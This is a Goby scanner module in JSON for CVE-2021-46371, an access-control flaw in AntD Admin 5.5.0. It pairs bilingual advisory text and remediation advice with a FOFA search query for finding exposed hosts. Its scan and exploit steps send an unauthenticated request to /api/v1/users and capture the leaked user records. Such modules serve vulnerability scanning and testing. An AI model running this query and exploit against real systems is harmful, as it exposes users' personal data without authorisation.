qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/AntD-Admin-Sensitive-Inform...

144 lines
6.1 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "AntD Admin Sensitive Information Disclosure Vulnerability (CVE-2021-46371)",
"Description": "<p>AntD Admin is an excellent front-end solution for enterprise applications built on Ant Design and UmiJs by individual developers of Zuiidea.</p><p>AntD Admin has a security vulnerability that stems from Antd-admin 5.5.0 being affected by an incorrect access control vulnerability. Attackers can exploit this vulnerability to gain unauthorized access to some front-end interfaces, resulting in the leakage of sensitive information.</p>",
"Product": "AntD Admin",
"Homepage": "https://github.com/zuiidea/antd-admin",
"DisclosureDate": "2022-02-22",
"Author": "vikkieen",
"FofaQuery": "body=\"/@@/devScripts.js\" && body=\"//! umi version:\" && body=\"/umi.js\"",
"GobyQuery": "body=\"/@@/devScripts.js\" && body=\"//! umi version:\" && body=\"/umi.js\"",
"Level": "2",
"Impact": "<p>Antd-admin 5.5.0 has an information disclosure vulnerability that could allow attackers to view user IDs, names, ages, phone numbers, addresses, and other sensitive information.<br></p>",
"Recommendation": "<p>1. There is currently no detailed solution provided, please pay attention to the update of the manufacturer's homepage: <a href=\"https://github.com/zuiidea/antd-admin/issues/1127\">https://github.com/zuiidea/antd-admin/issues/1127</a></p><p>2. Set access policies and whitelist access through security devices such as firewalls.</p><p>3. If it is not necessary, it is forbidden to access the system from the public network.</p>",
"References": [
"https://github.com/zuiidea/antd-admin/issues/1127"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/api/v1/users",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "image.zuiidea.com",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/api/v1/users",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "image.zuiidea.com",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|(?s)(.*)"
]
}
],
"Tags": [
"Information Disclosure"
],
"VulType": [
"Information Disclosure"
],
"CVEIDs": [
"CVE-2021-46371"
],
"CNNVD": [
"CNNVD-202202-1147"
],
"CNVD": [
""
],
"CVSSScore": "7.5",
"Translation": {
"CN": {
"Name": "AntD Admin 敏感信息泄露漏洞CVE-2021-46371",
"Product": "AntD Admin",
"Description": "<p>AntD Admin是Zuiidea个人开发者的一个基于 Ant Design 和 UmiJs 构建的企业应用程序的优秀前端解决方案。</p><p>AntD Admin 存在安全漏洞该漏洞源于Antd-admin 5.5.0受到错误访问控制漏洞的影响。攻击者可利用该漏洞前台部分接口未经授权访问,导致敏感信息泄露。</p>",
"Recommendation": "<p>1、目前没有详细的解决方案提供请关注厂商主页更新<a href=\"https://github.com/zuiidea/antd-admin/issues/1127\">https://github.com/zuiidea/antd-admin/issues/1127</a><br></p><p>2、通过防火墙等安全设备设置访问策略设置白名单访问。</p><p>3、如非必要禁止公网访问该系统。<br></p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16.96px;\">Antd-admin 5.5.0 存在信息泄露漏洞攻击者可利用该漏洞查看用户ID姓名年龄电话号码地址和其他敏感信息。</span><br></p>",
"VulType": [
"信息泄漏"
],
"Tags": [
"信息泄漏"
]
},
"EN": {
"Name": "AntD Admin Sensitive Information Disclosure Vulnerability (CVE-2021-46371)",
"Product": "AntD Admin",
"Description": "<p>AntD Admin is an excellent front-end solution for enterprise applications built on Ant Design and UmiJs by individual developers of Zuiidea.</p><p>AntD Admin has a security vulnerability that stems from Antd-admin 5.5.0 being affected by an incorrect access control vulnerability. Attackers can exploit this vulnerability to gain unauthorized access to some front-end interfaces, resulting in the leakage of sensitive information.</p>",
"Recommendation": "<p>1. There is currently no detailed solution provided, please pay attention to the update of the manufacturer's homepage: <a href=\"https://github.com/zuiidea/antd-admin/issues/1127\">https://github.com/zuiidea/antd-admin/issues/1127</a></p><p>2. Set access policies and whitelist access through security devices such as firewalls.</p><p>3. If it is not necessary, it is forbidden to access the system from the public network.</p>",
"Impact": "<p>Antd-admin 5.5.0 has an information disclosure vulnerability that could allow attackers to view user IDs, names, ages, phone numbers, addresses, and other sensitive information.<br></p>",
"VulType": [
"Information Disclosure"
],
"Tags": [
"Information Disclosure"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink